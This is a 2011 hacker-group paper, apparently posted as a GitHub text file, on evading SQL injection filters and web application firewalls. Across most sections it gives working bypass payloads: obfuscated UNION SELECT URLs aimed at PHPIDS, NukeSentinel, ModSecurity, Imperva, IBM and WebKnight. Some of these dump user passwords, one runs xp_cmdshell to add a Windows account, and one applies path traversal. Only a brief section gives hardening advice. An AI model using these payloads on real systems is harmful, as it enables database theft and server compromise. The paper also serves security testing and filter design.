-
Notifications
You must be signed in to change notification settings - Fork 1
/
Beyond SQLi - Obfuscate and Bypass WAFs.txt
625 lines (424 loc) · 29.8 KB
/
Beyond SQLi - Obfuscate and Bypass WAFs.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date : 2011-10-06
##########
Contents
##########
[0x00] - Introduction
[0x01] - Filter Evasion (Mysql)
[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering
[0x02] - Normally Bypassing Techniques
[0x03] - Advanced Bypassing Techniques
[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination
[0x04] - How to protect your website
[0x05] - Conclusion
[0x06] - References
[0x07] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on.
This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection.
There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system
in the real world even though you spend more than 300,000 USD on a WAF.
This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.
Section 0x01, we give a details of how to bypass filter including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution.
The last, section 0x05, It's conclusion from Section 0x01-0x04.
#################################
[0x01] - Filter Evasion (Mysql)
#################################
This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions.
This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.
+++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++
Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful.
However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users
when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.
Keyword filer: and, or
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or)/i', $id)
THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1
----------------------------------------------------------------------
Keyword filer: and, or, union
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union)/i', $id)
The keyword union is generally used to generate an malicious statement in order to select extra data from the database.
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement
e.g. use substring function to get each character of table names.
----------------------------------------------------------------------
Keyword filer: and, or, union, where
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by, select
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by, select, '
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by, select, ', hex
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
----------------------------------------------------------------------
Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
----------------------------------------------------------------------
From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions.
Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.
Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.
+++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - Bypass Regular Expression Filtering
+++++++++++++++++++++++++++++++++++++++++++++++
Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server.
However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.
PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols.
[Code]---------------------------------------------------------------
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
[End Code]-----------------------------------------------------------
[Code]---------------------------------------------------------------
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
[End Code]-----------------------------------------------------------
########################################
[0x02] - Normally Bypassing Techniques
########################################
In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application,
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers.
Some modern WAF systems work both with attack signatures and abnormal behavior.
Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!
1. Bypass with Comments
SQL comments allow us to bypass a lot of filtering and WAFs.
[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
[End Code]-----------------------------------------------------------
2. Case Changing
Some WAFs filter only lowercase SQL keyword.
Regex Filter: /union\sselect/g
[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
[End Code]-----------------------------------------------------------
3. Replaced keywords
Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.
[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
[End Code]-----------------------------------------------------------
Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.
[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
[End Code]-----------------------------------------------------------
For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/".
Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
4. Character encoding
Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so
double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep
decoding the SQL statement executing
[Code]-----------------------------------------------------------------------------------------------------------------
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
[End Code]-------------------------------------------------------------------------------------------------------------
Moreover, these techniques can combine to bypass Citrix Netscaler
- Remove all "NULL" words
- Use query encoding in some parts
- Remove the single quote character "'"
- And Have fun !!
Credit: Wendel Guglielmetti Henrique
and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character.
#Real World Example
1. NukeSentinel (Nuke Evolution)
[Nukesentinel.php Code]------------------------------------------------------------
// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
if (stristr($nsnst_const['query_string'],'+union+') OR \
stristr($nsnst_const['query_string'],'%20union%20') OR \
stristr($nsnst_const['query_string'],'*/union/*') OR \
stristr($nsnst_const['query_string'],' union ') OR \
stristr($nsnst_const['query_string_base64'],'+union+') OR \
stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
die("BLOCK IP 1 " );
}
}
[End Code]-------------------------------------------------------------------------
We can bypass their filtering with these script:
Forbidden: http://victim.com/php-nuke/?/**/union/**/select
..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect
2. Mod Security CRS (Credit: Johannes Dahse)
[SecRule]--------------------------------------------------------------------------
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
[End Rule]-------------------------------------------------------------------------
We can bypass their filtering with this code:
[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
[End Code]--------------------------------------------------------------------------
From this attack, We can bypass Mod Security rule. Let see what's happen !!
MySQL Server supports 3 comment styles:
- From a "#" character to the end of the line
- From a "--" sequence to the end of the line
- From a /* sequence to the following */ sequence, as in the C programming language.
This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
not be on the same line.
The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
The resulting SQL payload looked something like this:
0 div 1 union#foo*/*/bar
select#foo
1,2,current_user
However the SQL payload, when executed by the MySQL DB, looked something like this:
0 div 1 union select 1,2,current_user
5. Buffer Overflow
WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.
Give a large amount of data allows our code executing
[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
414141414141
.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
[End Code]--------------------------------------------------------------------------
6. Inline Comments (Mysql Only)
From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write
code that includes MySQL extensions, but is still portable, by using comments of the following form:
/*! MySQL-specific code */
In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
but other SQL servers will ignore the extensions.
A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.
[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
[End Code]--------------------------------------------------------------------------
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can
add more inline comments
[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
[End Code]--------------------------------------------------------------------------
########################################
[0x03] - Advanced Bypassing Techniques
########################################
In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination".
From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)
++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - HTTP Parameter Pollution: Split and Join
++++++++++++++++++++++++++++++++++++++++++++++++++++
HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting
query string.
Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"
HTTP Parameter Handling: (Example)
+------------------------------------------------------------------+
| Web Server | Parameter Interpretation | Example |
+------------------------------------------------------------------+
| ASP.NET/IIS | Concatenation by comma | par1=val1,val2 |
| ASP/IIS | Concatenation by comma | par1=val1,val2 |
| PHP/Apache | The last param is resulting | par1=val2 |
| JSP/Tomcat | The first param is resulting | par1=val1 |
| Perl/Apache | The first param is resulting | par1=val1 |
| DBMan | Concatenation by two tildes | par1=val1~~val2 |
+------------------------------------------------------------------+
What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates
multiple occurrences (ASP, ASP.NET, DBMan,
) an aggressor can split the malicious payload.
In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:
#Real World Example:
1. Mod Security CRS (Credit: Lavakumar Kuppan)
The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.
Forbidden: http://victim.com/search.aspx?q=select name,password from users
When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.
Bypassed : http://victim.com/search.aspx?q=select name&q=password from users
Let's see what's happen, ModSecurity's interpretation is
q=select name
q=password from users
ASP/ASP.NET's interpretation is
q=select name,password from users
*Tip: This attack can be carried out on a POST variable in a similar way
2. Commercial WAFs
Forbidden: http://victim.com/search.aspx?q=select name,password from users
Now we use HPP+Inline comment to bypass it.
Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Analyzing, WAF's interpretation is
q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/users
ASP/ASP.NET's interpretation is
q=select/*,*/name,password/*,*/from/*,*/users
q=select name,password from users
3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)
Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell net user zeq3ul UrWaFisShiT /add --
Now we use HPP+Inline comment to bypass it.
Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user lucifer UrWaFisShiT /*&id=1*/ --
Analyzing, WAF's interpretation is
id=1; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ net user zeq3ul UrWaFisShiT /*
id=1*/ --
ASP/ASP.NET's interpretation is
id=1; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ net user zeq3ul UrWaFisShiT /*,1*/ --
id=1; EXEC master..xp_cmdshell net user zeq3ul UrWaFisShiT --
The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request.
This would prevent all variations of this attack.
However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters.
And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF
should also interpret the HTTP request in the same way the web application would.
++++++++++++++++++++++++++++++++++++++++
[0x03b] - HTTP Parameter Contamination
++++++++++++++++++++++++++++++++++++++++
HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by
exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string
parameter contamination with reserved or non expects characters.
Some facts:
- The term Query String is commonly used to refer to the part between the "?" and the end of the URI
- As defined in the RFC 3986, it is a series of field-value pairs
- Pairs are separated by "&" or ";"
- RFC 2396 defines two classes of characters:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `
Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations,
but we will stop here this time.
Query string and Web server response (Example)
+-----------------------------------------------------------+
| Query String | Web Servers response / GET values |
+-----------------------------------------------------------+
| | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
+-----------------------------------------------------------+
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test=1 | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |
+-----------------------------------------------------------+
Magic character "%" affect to ASP/ASP.NET
+--------------------------------------------------------------------+
| Keywords | WAF | ASP/ASP.NET |
+--------------------------------------------------------------------+
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
| <scr%ipt> | <scr%ipt> | <script> |
| <if%rame> | <if%rame> | <iframe> |
+--------------------------------------------------------------------+
#Real world examples:
1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf)
[Filtered]----------------------------------------------------------------------------------
[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b"
at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"]
[rev "2.2.0"] [msg "Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"]
[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]
[End Code]------------------------------------------------------------------------------
Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
2. Bypass URLScan 3.1 DenyQueryStringSequences rule
Forbidden: http://localhost/test.asp?file=../bla.txt
Bypassed : http://localhost/test.asp?file=.%./bla.txt
3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)
Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these
command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors.
HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform,
if there is WAF who blocks this kind of an attack.
######################################
[0x04] - How to protect your website
######################################
- Implement Software Development Life Cycle (SDLC)
- Secure Coding: Validate all inputs and outputs
- PenTest before online
- Harden it !!
- Revisit PenTest
- Deploy WAF (For Optional)
- Always check WAF patch
#####################
[0x05] - Conclusion
#####################
- WAFs is not the long-expected
- It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt WAF filter to the particular web app being protected
- WAF doesn't eliminate a vulnerability, It just partly screens the attack vector
#####################
[0x06] - References
#####################
[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com
####################
[0x07] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx : Exploit-db.com
----------------------------------------------------
Our disclosure purpose isn't helping security products but need to reveal theirs shit.
Security Products not able to 100% protect from damn config/coding of admin.
Just need a time and imagination for breach it !!
----------------------------------------------------